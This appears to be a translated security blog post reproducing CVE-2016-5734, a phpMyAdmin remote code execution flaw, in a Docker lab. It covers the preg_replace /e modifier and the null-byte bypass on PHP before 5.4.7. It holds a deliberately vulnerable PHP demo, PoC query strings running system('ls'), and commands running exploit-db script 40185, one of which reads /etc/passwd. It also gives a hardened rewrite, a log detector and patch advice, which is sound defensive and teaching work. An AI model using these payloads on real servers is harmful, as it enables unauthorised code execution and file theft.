CVE-2016-5734 phpMyAdmin backend code execution vulnerability reproduction


Vulnerability description

  CVE-2016-5734 is listed on exploit-db as "phpMyAdmin 4.6.2 - Authenticated Remote Code Execution", that is, remote code execution by an authenticated phpMyAdmin user. According to the description, all phpMyAdmin 4.6.x versions (up to 4.6.3), 4.4.x versions (up to 4.4.15.7) and 4.0.x versions (up to 4.0.10.16) are affected. The author of the CVE exploited a null-byte handling bug in the preg_replace function of PHP versions before 5.4.7, so that injected code is executed remotely.


Affected versions

  • phpmyadmin 4.6.x version (up to 4.6.3)
  • phpmyadmin 4.4.x version (up to 4.4.15.7)
  • phpmyadmin 4.0.x version (up to 4.0.10.16)
  • PHP version: 4.3.0 ~ 5.4.6

Building the vulnerable environment

Use vulhub to start the vulnerable environment with docker in one step.

Docker quick start and environment setup

After downloading and installing vulhub, enter the /vulhub/phpmyadmin/CVE-2016-5734 directory and run the following command to start the environment:

sudo docker-compose up -d

After the environment starts, check the port mapping: the service is published on port 8080 of the host.
Visit localhost:8080 in the virtual machine; if the phpMyAdmin interface appears, the installation succeeded.

Vulnerability analysis

  • First, the preg_replace function: it performs a regular expression
    search and replacement.

  • Next, the role of the \e modifier of preg_replace: if this deprecated
    modifier is set, preg_replace() first substitutes the backreferences in
    the replacement string, then evaluates the result as PHP code (as eval()
    would) and uses the return value as the string that is actually
    substituted. Single quotes, double quotes, backslashes (\) and NULL
    characters are escaped with backslashes in the substituted backreferences.

Test code execution through \e:

<?php
    highlight_file(__FILE__);
    $raw = $_GET['raw'];          // regex body, taken straight from the request
    $replace = $_GET['replace'];  // replacement string
    $text = $_GET['text'];        // subject string

    // /e: the replacement string is evaluated as PHP code (deliberately vulnerable demo)
    $text = preg_replace('/'.$raw.'/e', $replace, $text);
?>

PoC:

?raw=a&replace=system("ls")&text=larry

If the demo is changed to the following code, is it still vulnerable?

<?php
    highlight_file(__FILE__);
    $raw = $_GET['raw'];          // regex body, still taken from the request
    $replace = $_GET['replace'];  // replacement string
    $text = $_GET['text'];        // subject string

    // only /i is set, so the replacement looks like plain text at first glance
    $text = preg_replace('/'.$raw.'/i', $replace, $text);
?>

In fact, it can still be bypassed. When the PHP version is lower than 5.4.7, injecting a null byte into the pattern truncates it, so the trailing /i is cut off; by placing the e modifier in front of the null byte, the replacement is executed as PHP code.

PoC:

?raw=a/e%00&replace=system(%22ls%22)&text=larry
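As an added example (not code from the original post), the demo above can be rewritten so that neither the truncation trick nor the e modifier has anything to work on. The function below keeps the page's three inputs (raw, replace, text); in a real script they would come from $_GET, here they are passed in directly so the file runs from the command line.

```php
<?php
// Added example (not from the original post): a hardened rewrite of the
// page's demo script. Same three inputs (raw, replace, text), but user
// input never reaches the regex engine as a pattern and is never evaluated.

function safe_replace($raw, $replace, $text)
{
    // 1. Reject NUL bytes outright. On PHP < 5.4.7 a NUL inside the pattern
    //    truncates it, which is what lets "a/e%00" smuggle in the e modifier;
    //    there is no legitimate reason for a NUL in form input.
    foreach (array($raw, $replace, $text) as $value) {
        if (strpos($value, "\0") !== false) {
            throw new InvalidArgumentException('NUL byte in input');
        }
    }

    // 2. Treat the search string as a literal. preg_quote() escapes the
    //    delimiter and every PCRE metacharacter, so "a/e" becomes "a\/e"
    //    and can no longer close the pattern or append modifiers.
    $pattern = '/' . preg_quote($raw, '/') . '/';

    // 3. Use preg_replace_callback() instead of the /e modifier. The
    //    callback returns the replacement as data: nothing is eval()'d, and
    //    "$1"-style backreferences inside $replace are not expanded either.
    $result = preg_replace_callback(
        $pattern,
        function ($m) use ($replace) { return $replace; },
        $text
    );

    if ($result === null) {
        throw new RuntimeException('preg_replace_callback failed, error ' . preg_last_error());
    }
    return $result;
}

// Same input as the page's first PoC (raw=a, replace=system("ls"), text=larry):
// the text system("ls") is substituted for "a" as a plain string.
echo safe_replace('a', 'system("ls")', 'larry'), "\n";

// The bypass input from the second PoC: rejected before preg_* ever sees it.
try {
    safe_replace("a/e\0", 'system("ls")', 'larry');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The first call prints the subject with system("ls") inserted as literal text and runs nothing; the second throws before any regex is compiled. The NUL check is belt-and-braces: on PHP 5.4.7 and later the null byte no longer truncates the pattern, and on PHP 7 the /e modifier itself is gone, but preg_quote() plus preg_replace_callback() is the part that keeps the code safe regardless of PHP version.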


For the analysis of the vulnerable phpMyAdmin code, see the following article:
https://xz.aliyun.com/t/7836#toc-5


Exploit

Precondition: the database account and password must be known.

Download the exploit script:
https://www.exploit-db.com/exploits/40185

Script usage:

-u account
-p password
-c code to execute (PHP code); uname -a is executed by default

python 40185.py -u root -p root http://192.168.154.3:8080


python 40185.py -u root -p root -c "system('cat /etc/passwd')" http://192.168.154.3:8080
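From the defender's side, the request shape used above (a closing regex delimiter, an e modifier, then an encoded null byte) is easy to spot in web-server logs. The following is an added example, not part of the original post or the exploit script: it scans constructed access-log lines and flags requests whose decoded query string carries that pattern. The second sample line reuses the page's own PoC query; the other lines are invented benign traffic.

```php
<?php
// Added example (not from the original post): detection logic for the
// null-byte + /e bypass, run over web-server access-log lines. All three
// log lines below are constructed for this demo.

// Pull the request target out of an Apache/Nginx combined-format line.
function request_target($line)
{
    if (preg_match('~"(?:GET|POST|HEAD) (\S+) HTTP/~', $line, $m)) {
        return $m[1];
    }
    return null;
}

// True when the decoded query string carries both ingredients of the
// PHP < 5.4.7 bypass: a closing delimiter with an "e" modifier immediately
// followed by a NUL byte (e.g. "a/e\0"). Decoding first matters, because
// the NUL arrives as "%00" and the delimiter may be encoded as "%2F".
function looks_like_preg_e_bypass($target)
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;
    }
    $decoded = rawurldecode($query);
    // PHP strings are binary safe, so the literal NUL can be matched directly.
    return preg_match('~/[A-Za-z]*e[A-Za-z]*\x00~', $decoded) === 1;
}

// Scan a batch of lines; returns the flagged request targets keyed by line number.
function scan_log(array $lines)
{
    $hits = array();
    foreach ($lines as $i => $line) {
        $target = request_target($line);
        if ($target !== null && looks_like_preg_e_bypass($target)) {
            $hits[$i + 1] = $target;
        }
    }
    return $hits;
}

// Constructed sample log (not real traffic); line 2 carries the page's PoC query.
$sample = array(
    '10.0.0.5 - - [21/Sep/2016:10:00:01 +0000] "GET /test.php?raw=a&replace=b&text=larry HTTP/1.1" 200 512',
    '10.0.0.5 - - [21/Sep/2016:10:00:07 +0000] "GET /test.php?raw=a/e%00&replace=system(%22ls%22)&text=larry HTTP/1.1" 200 734',
    '10.0.0.9 - - [21/Sep/2016:10:01:15 +0000] "GET /index.php?route=home HTTP/1.1" 200 1024',
);

foreach (scan_log($sample) as $lineNo => $target) {
    echo "line $lineNo: possible preg_replace /e + NUL bypass in $target\n";
}
```

Only the second line is reported. The check deliberately requires the NUL byte as well as the modifier, since a bare "/e" appears in plenty of legitimate URLs; a looser rule that alerts on any %00 in a query string is also reasonable, because null bytes have no business in form input, but it will be noisier.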



Vulnerability hardening

Upgrade PHP (5.4.7 or later is not affected) or upgrade phpMyAdmin past the affected versions listed above.

Reference link

https://larry.ngrep.me/2016/09/21/cve-2016-5734-analysis/
https://xz.aliyun.com/t/7836

Origin blog.csdn.net/weixin_41924764/article/details/113063083